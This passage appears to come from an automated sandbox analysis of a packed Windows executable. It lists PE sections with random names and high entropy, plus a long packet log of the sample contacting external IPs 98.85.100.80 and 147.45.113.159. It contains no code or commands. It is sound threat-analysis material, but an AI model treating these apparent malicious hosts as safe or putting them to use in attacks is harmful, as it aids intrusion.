                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0xb47a740x18jjnhjgow
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    0x10000x6170000x283e003f0c6da58bd980d0da9ce5d705798834unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x6180000x2b00x2005ee0affac9946bfe80db244b29256d00False0.798828125data6.10284653547224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .idata 0x6190000x10000x200e8fbf92e0939d0cd4935f0fe539e974dFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    0x61a0000x37e0000x200f55e6a6dead6076ea79d167f3858cbdfunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    jjnhjgow0x9980000x1b00000x1afe00d41378ede797d70000d94866a61d029fFalse0.9944498462373372data7.956153256454164IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    esuyrufd0xb480000x10000x4006fc9ce45163daba0d3983085382fa87cFalse0.7666015625data6.030541377984814IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .taggant0xb490000x30000x220028eec474db5f14327a32b58db7c33a7fFalse0.06606158088235294DOS executable (COM)0.7757499404800886IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_MANIFEST0xb47ad40x256ASCII text, with CRLF line terminators0.5100334448160535

                                                    Imports

                                                    DLLImport
                                                    kernel32.dlllstrcpy

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 20, 2024 17:06:48.417304993 CET49710443192.168.2.1298.85.100.80
                                                    Dec 20, 2024 17:06:48.417354107 CET4434971098.85.100.80192.168.2.12
                                                    Dec 20, 2024 17:06:48.417412996 CET49710443192.168.2.1298.85.100.80
                                                    Dec 20, 2024 17:06:48.428602934 CET49710443192.168.2.1298.85.100.80
                                                    Dec 20, 2024 17:06:48.428621054 CET4434971098.85.100.80192.168.2.12
                                                    Dec 20, 2024 17:06:50.231560946 CET4434971098.85.100.80192.168.2.12
                                                    Dec 20, 2024 17:06:50.232068062 CET49710443192.168.2.1298.85.100.80
                                                    Dec 20, 2024 17:06:50.232084990 CET4434971098.85.100.80192.168.2.12
                                                    Dec 20, 2024 17:06:50.234373093 CET4434971098.85.100.80192.168.2.12
                                                    Dec 20, 2024 17:06:50.234450102 CET49710443192.168.2.1298.85.100.80
                                                    Dec 20, 2024 17:06:50.235862017 CET49710443192.168.2.1298.85.100.80
                                                    Dec 20, 2024 17:06:50.236047983 CET4434971098.85.100.80192.168.2.12
                                                    Dec 20, 2024 17:06:50.245522976 CET49710443192.168.2.1298.85.100.80
                                                    Dec 20, 2024 17:06:50.245534897 CET4434971098.85.100.80192.168.2.12
                                                    Dec 20, 2024 17:06:50.288594007 CET49710443192.168.2.1298.85.100.80
                                                    Dec 20, 2024 17:06:50.569370985 CET4434971098.85.100.80192.168.2.12
                                                    Dec 20, 2024 17:06:50.569678068 CET4434971098.85.100.80192.168.2.12
                                                    Dec 20, 2024 17:06:50.569785118 CET49710443192.168.2.1298.85.100.80
                                                    Dec 20, 2024 17:06:50.578748941 CET49710443192.168.2.1298.85.100.80
                                                    Dec 20, 2024 17:06:50.578780890 CET4434971098.85.100.80192.168.2.12
                                                    Dec 20, 2024 17:06:51.403084040 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:51.522675991 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.522891998 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:51.523880959 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:51.643480062 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.643568993 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.643656015 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.643666029 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.643696070 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.643711090 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:51.643724918 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.643747091 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:51.643767118 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.643778086 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.643800974 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:51.643817902 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.643851042 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.643996954 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:51.763325930 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.763343096 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.763427019 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.763437033 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.763443947 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:51.763489962 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.763509035 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.763516903 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:51.763559103 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:51.806781054 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.807451010 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:51.939213991 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:51.940555096 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.058720112 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.058811903 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.106659889 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.258686066 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.258816957 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.502707958 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.502974987 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.640917063 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.644690990 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.644797087 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.764384031 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.764504910 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.764555931 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.764605045 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.764615059 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.764659882 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.764702082 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.764748096 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.764751911 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.764801979 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.764902115 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.764949083 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.765028000 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.765074015 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.765153885 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.765185118 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.765199900 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.765240908 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.765324116 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.765372992 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.765431881 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.765505075 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.765639067 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.765695095 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.765940905 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.766002893 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.766124964 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.766176939 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.766177893 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.766227007 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.766583920 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.766613960 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.766784906 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.767141104 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.770042896 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.810630083 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.810798883 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.884205103 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.884296894 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.884331942 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.884378910 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.884439945 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.884490013 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.884491920 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.884601116 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.884654999 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.884774923 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.884849072 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.884886980 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.884938955 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.885060072 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.885279894 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.885572910 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.885751963 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.885893106 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.885941982 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.885972977 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.886399984 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.889873981 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.889903069 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.889935017 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.889982939 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.890067101 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.890114069 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.890177965 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.890224934 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.890363932 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.890419006 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.890470028 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.890496969 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.890547991 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.890594006 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.890675068 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.890738964 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.890789986 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.890818119 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.890862942 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.890896082 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.891129971 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.891164064 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.891273022 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.891304016 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.891415119 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.891442060 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.891510010 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.891536951 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.891711950 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.891738892 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.891836882 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.891885996 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.891917944 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.892093897 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.892286062 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.892369986 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.892400980 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.892461061 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.892507076 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.892570019 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.892640114 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.892687082 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.892846107 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.892894983 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.893135071 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.893218994 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:52.924285889 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.924384117 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:52.930474997 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.004317045 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.004391909 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.004425049 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.004535913 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.004570007 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.004637003 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.004767895 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.005115032 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:53.005232096 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:53.044086933 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.044121981 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.044205904 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.044250011 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.044296980 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.044326067 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.044393063 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.044435024 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.044486046 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.044532061 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.044564009 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.044612885 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.044666052 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.044713974 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.044764996 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.044847965 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.044954062 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.044981003 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045064926 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045093060 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045114994 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045156956 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045206070 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045233965 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045280933 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045308113 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045355082 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045382977 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045490026 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045517921 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045557022 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045660019 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045686960 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045734882 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045763016 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045794010 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045878887 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045912027 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.045978069 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.046006918 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.046089888 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.046118021 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.046164989 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.046191931 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.046240091 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.046267033 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.046369076 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.046396971 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.046428919 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.046587944 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.046616077 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.046643972 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.046674967 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.046818018 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.047322035 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:53.047435999 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:53.124949932 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.124990940 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.125067949 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.125096083 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.125164986 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.125215054 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.125247002 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.125297070 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.125420094 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.125448942 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.125524998 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.125576019 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.125614882 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.125735998 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.125770092 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.125932932 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.125965118 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126163006 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126224995 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126487017 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126522064 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126569986 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126617908 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126781940 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126808882 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126936913 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.126964092 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127033949 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127063036 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127110004 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127137899 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127198935 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127248049 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127295017 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127341986 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127374887 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127422094 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127490997 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127518892 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127567053 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127593040 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127650023 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127676964 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127758980 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127806902 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127840042 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127969980 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.127998114 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.128030062 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.128145933 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.128174067 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.128201008 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.128248930 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.128277063 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.128576040 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:06:53.167130947 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167169094 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167273998 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167342901 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167435884 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167470932 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167536020 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167567015 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167613983 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167648077 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167752028 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167781115 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167861938 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167891026 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167924881 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.167972088 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168132067 CET8049711147.45.113.159192.168.2.12
